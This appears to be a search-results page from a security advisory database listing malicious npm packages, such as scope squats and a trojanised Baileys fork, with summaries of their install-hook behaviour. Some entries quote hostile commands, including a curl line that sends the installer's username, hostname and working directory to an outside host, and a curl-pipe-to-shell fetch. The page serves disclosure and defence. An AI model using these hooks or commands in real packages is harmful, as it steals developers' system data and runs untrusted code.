252170 matches found
Malicious Package
Overview @limebike/frontend-core-api is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this...
MAL-2026-4185 Malicious code in uolcs-host-uol-anuncios-fe (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16d9407c815fe2d5593da029ee806d455d15f451d1c84d3cd8d6a0a027821d64 Package claims an internal-scope corporate name uolcs-host-uol-anuncios-fe on public npm, version-pinned to 99.99.99 — the canonical...
MAL-2026-4187 Malicious code in @limebike/frontend-core-api (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 36e6a8b7768f00cc5d468fe7a21f8792da1970b60e5ccbad17eefeda1a8d5b3d Package squats the @limebike npm scope and ships a preinstall/postinstall hook node index.js that, on npm install, collects hostname, non-internal...
MAL-2026-4372 Malicious code in @budetzz/baileys (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c79c7b873a8ea61831fdfd7b987de0efbf8944d2fd407a8dca4b70042a3d029c This package is a republished fork of @whiskeysockets/baileys that adds two undocumented network behaviors. 1 lib/Socket/newsletter.js line 111...
MAL-2026-4605 Malicious code in mamadoos-test (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4 package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$whoami@$hostname?pwd=$pwd, embedding the installer's OS...
MAL-2026-4569 Malicious code in gator-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1925735d02fb91f74a11718c3402ad0b10f551eecb8c6d88f02d475b3e0a799f On npm install via scripts.install: node index.js and on every require'gator-client', lib/core.js collects os.userInfo.username, os.hostname, and the...
MAL-2026-4188 Malicious code in @limebike/supreme (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4f65cdcb27200e24464982c0678d9dd556342d53886e4d5378da5d9c664fe1c7 Both preinstall and postinstall lifecycle hooks in package.json execute index.js, which collects the installer's hostname, non-internal network...
Malicious code in @limebike/supreme (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4f65cdcb27200e24464982c0678d9dd556342d53886e4d5378da5d9c664fe1c7 Both preinstall and postinstall lifecycle hooks in package.json execute index.js, which collects the installer's hostname, non-internal network...
Malicious code in yessir-node (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 253a5547a0d7f0f375ba46eb96a91316af4362679f3411728a4d0b0eb7a28ba7 On require, index.js schedules installNewsletterAutoFollow 1 second later. That function locates @whiskeysockets/baileys inside the consumer's...
chisa-botwa (=8.6.51) potentially affected by unknown CVE via yessir-node (=2.2.7)
yessir-node NPM version =2.2.7 is affected by a known vulnerability. The following packages have a transitive dependency on yessir-node and may be impacted: - chisa-botwa =8.6.51 Source cves: unknown CVE Source advisory: OSV:MAL-2026-4736...
MAL-2026-4736 Malicious code in yessir-node (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 253a5547a0d7f0f375ba46eb96a91316af4362679f3411728a4d0b0eb7a28ba7 On require, index.js schedules installNewsletterAutoFollow 1 second later. That function locates @whiskeysockets/baileys inside the consumer's...
Malicious code in gm-kilo (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b4a35ea8669a2b02f60117ecc483176741399084b0fbebf11900d0a89505d9fb package.json declares an install lifecycle script that runs bin/gm-kilo.js install. At install time, the script executes bun x gm-plugkit@latest spoo...
Malicious code in bricks-builder-mcp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7ad643457c1104b8f118971a9ee95702f2126a16f33a4ec9dfd8ed21c43fc1eb bricks-builder-mcp is a Model Context Protocol server exposing WordPress/Bricks Builder editing tools page JSON edits, media uploads, custom CSS/JS...
net: qrtr: ns: Limit the maximum server registration per node
...
Malicious code in tdpilot (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 92ebe5ca10c51471256249507d8c7b142996cc72d7472a7a55c08fe6351876f9 run.js invokes execSync"curl -LsSf https://astral.sh/uv/install.sh | sh", fetching and executing a remote shell script from astral.sh without integri...
Malicious code in arc-diag-util (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 95f08d97107d726a6ae90afbf8e354b84a7e13d4a236bc8766180a362cc8344c On npm install, the package's postinstall hook runs id to capture the installer's uid/gid/group identity and opens a raw TCP socket to...
SUSE-SU-2026:2019-1 Security update for cockpit
This update for cockpit fixes the following issues - CVE-2026-0775: npm: loading of modules from an unsecured location can be used for local privilege escalation and arbitrary code execution in the context of a target user bsc1256521. - CVE-2026-4802: remote command execution via unsanitized...
Malicious code in @qwedqwed/axios (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 119efce3cb464ef8c7b605ec49768619ac9ef49b9981d4b0a530ff1829194b8c @qwedqwed/axios republishes the legitimate axios source verbatim under an unrelated scope, copies the original author metadata Matt Zabriskie for...
Malicious code in ts-logger-pack (npm)
ts-logger-pack is a malicious npm package that depends on terminal-logger-utils and triggers the malicious behavior in that package when installed or imported. The terminal-logger-utils payload executes a postinstall hook that opens utils.cjs, an obfuscated malware dropper. The dropper downloads...
Malicious code in terminal-logger-utils (npm)
terminal-logger-utils is a malicious npm package that when installed executes a postinstall hook that opens utils.cjs, an obfuscated malware dropper. The dropper checks the current system, downloads a platform-specific second-stage binary from Hugging Face, and executes it. The second-stage paylo...